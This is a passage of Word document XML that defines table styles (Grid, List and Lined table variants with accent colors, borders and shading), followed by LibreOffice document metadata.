    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent4" w:sz="12" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00"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59">
    <w:name w:val="Grid Table 6 Colorful - Accent 5"/>
    <w:basedOn w:val="66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val="404040" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275" w:themeColor="accent5" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275" w:themeColor="accent5" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent5" w:sz="12" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275" w:themeColor="accent5" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275"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60">
    <w:name w:val="Grid Table 6 Colorful - Accent 6"/>
    <w:basedOn w:val="66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404040" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275" w:themeColor="accent5" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275" w:themeColor="accent5" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent6" w:sz="12" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275" w:themeColor="accent5" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275"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61">
    <w:name w:val="Grid Table 7 Colorful"/>
    <w:basedOn w:val="665"/>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1"/>
    <w:basedOn w:val="66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07abd"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val="307abd" w:themeColor="accent1" w:themeTint="80" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="307abd"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val="307abd"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307abd"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val="307abd"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2"/>
    <w:basedOn w:val="66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cb5d12"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cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tbl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3"/>
    <w:basedOn w:val="66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616161"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616161" w:themeColor="accent3" w:themeTint="fe" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="616161"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val="616161"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616161"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val="616161"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4"/>
    <w:basedOn w:val="66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d09d0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d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tbl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5"/>
    <w:basedOn w:val="66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54275"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val="254275" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="254275" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="none"/>
          <w:right w:val="single" w:color="000000" w:themeColor="accent5" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:color="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275"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254275" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none"/>
          <w:left w:val="single" w:color="000000" w:themeColor="accent5" w:sz="4" w:space="0"/>
          <w:bottom w:val="none"/>
          <w:right w:val="none"/>
        </w:tcBorders>
        <w:shd w:color="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="254275"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Grid Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="66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416529" w:themeColor="accent6"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416529" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="416529" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="none"/>
          <w:right w:val="single" w:color="000000" w:themeColor="accent6" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:color="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="416529"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416529" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none"/>
          <w:left w:val="single" w:color="000000" w:themeColor="accent6" w:sz="4" w:space="0"/>
          <w:bottom w:val="none"/>
          <w:right w:val="none"/>
        </w:tcBorders>
        <w:shd w:color="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="416529"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w:basedOn w:val="665"/>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1"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="D6E6F4" w:themeFill="accent1" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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2"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="FADECB" w:themeFill="accent2" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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3"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="E8E8E8" w:themeFill="accent3" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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4"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFEFBF" w:themeFill="accent4" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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5"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="D0DCF0" w:themeFill="accent5" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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1 Light - Accent 6"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="DBECD0" w:themeFill="accent6" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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w:basedOn w:val="665"/>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1"/>
    <w:basedOn w:val="66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2"/>
    <w:basedOn w:val="66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3"/>
    <w:basedOn w:val="66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4"/>
    <w:basedOn w:val="66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5"/>
    <w:basedOn w:val="66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2 - Accent 6"/>
    <w:basedOn w:val="66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1"/>
    <w:basedOn w:val="66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4B285"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3"/>
    <w:basedOn w:val="66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9C9C9"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D965"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5"/>
    <w:basedOn w:val="66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8EAADB"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3 - Accent 6"/>
    <w:basedOn w:val="66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A9D18F"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1"/>
    <w:basedOn w:val="66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2"/>
    <w:basedOn w:val="66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D7D31"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3"/>
    <w:basedOn w:val="66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5A5A5"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4"/>
    <w:basedOn w:val="66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FC000"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5"/>
    <w:basedOn w:val="66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472C4"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4 - Accent 6"/>
    <w:basedOn w:val="66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70AD47"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
    <w:name w:val="List Table 5 Dark"/>
    <w:basedOn w:val="665"/>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7">
    <w:name w:val="List Table 5 Dark - Accent 1"/>
    <w:basedOn w:val="66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5B9BD5" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="5B9BD5" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="5B9BD5"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8">
    <w:name w:val="List Table 5 Dark - Accent 2"/>
    <w:basedOn w:val="66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9">
    <w:name w:val="List Table 5 Dark - Accent 3"/>
    <w:basedOn w:val="66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0">
    <w:name w:val="List Table 5 Dark - Accent 4"/>
    <w:basedOn w:val="66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1">
    <w:name w:val="List Table 5 Dark - Accent 5"/>
    <w:basedOn w:val="66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2">
    <w:name w:val="List Table 5 Dark - Accent 6"/>
    <w:basedOn w:val="66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3">
    <w:name w:val="List Table 6 Colorful"/>
    <w:basedOn w:val="665"/>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1"/>
    <w:basedOn w:val="66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val="404040" w:themeColor="accent1" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="245b8d" w:themeColor="accent1" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="245b8d" w:themeColor="accent1" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="245b8d" w:themeColor="accent1" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="245b8d"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2"/>
    <w:basedOn w:val="66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404040" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent2" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12"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3"/>
    <w:basedOn w:val="66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404040" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="767676" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="767676" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent3" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="767676" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="767676"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4"/>
    <w:basedOn w:val="66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404040" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent4" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="d09d00"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5"/>
    <w:basedOn w:val="66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val="404040" w:themeColor="accent5" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="335aa1" w:themeColor="accent5" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="335aa1" w:themeColor="accent5" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent5" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="335aa1" w:themeColor="accent5" w:themeTint="9a" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="335aa1"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6 Colorful - Accent 6"/>
    <w:basedOn w:val="66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404040" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="5e923c" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="5e923c" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent6" w:sz="4" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="5e923c" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="5e923c"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10">
    <w:name w:val="List Table 7 Colorful"/>
    <w:basedOn w:val="665"/>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111">
    <w:name w:val="List Table 7 Colorful - Accent 1"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:right w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="245b8d"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val="245b8d" w:themeColor="accent1" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="245b8d" w:themeColor="accent1" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="none"/>
          <w:right w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:color="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="245b8d"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245b8d" w:themeColor="accent1" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none"/>
          <w:left w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
          <w:bottom w:val="none"/>
          <w:right w:val="none"/>
        </w:tcBorders>
        <w:shd w:color="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="245b8d"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45b8d" w:themeColor="accent1" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="112">
    <w:name w:val="List Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="665"/>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cb5d12"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cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tbl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cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="113">
    <w:name w:val="List Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="665"/>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67676"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767676" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="767676"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val="767676"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767676"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val="767676"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67676" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="114">
    <w:name w:val="List Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="665"/>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d09d0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d09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tbl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09d00" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="115">
    <w:name w:val="List Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="665"/>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35aa1"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val="335aa1" w:themeColor="accent5" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="335aa1"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val="335aa1"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335aa1"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val="335aa1"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35aa1" w:themeColor="accent5" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="116">
    <w:name w:val="List Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="665"/>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5e923c"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5e923c" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="5e923c"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val="5e923c"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5e923c"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val="5e923c"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5e923c" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="117">
    <w:name w:val="Lined - Accent"/>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1"/>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2"/>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3"/>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4"/>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5"/>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Lined - Accent 6"/>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w:basedOn w:val="665"/>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1"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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2"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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3"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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4"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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5"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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amp; Lined - Accent 6"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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w:basedOn w:val="665"/>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7">
    <w:name w:val="Bordered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665">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LibreOffice/26.2.6.3$Linux_X86_64 LibreOffice_project/620$Build-3</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>34</Pages>
  <Words>5183</Words>
  <Characters>33714</Characters>
  <CharactersWithSpaces>38906</CharactersWithSpaces>
  <Paragraphs>789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2026-10-16T12:20:26Z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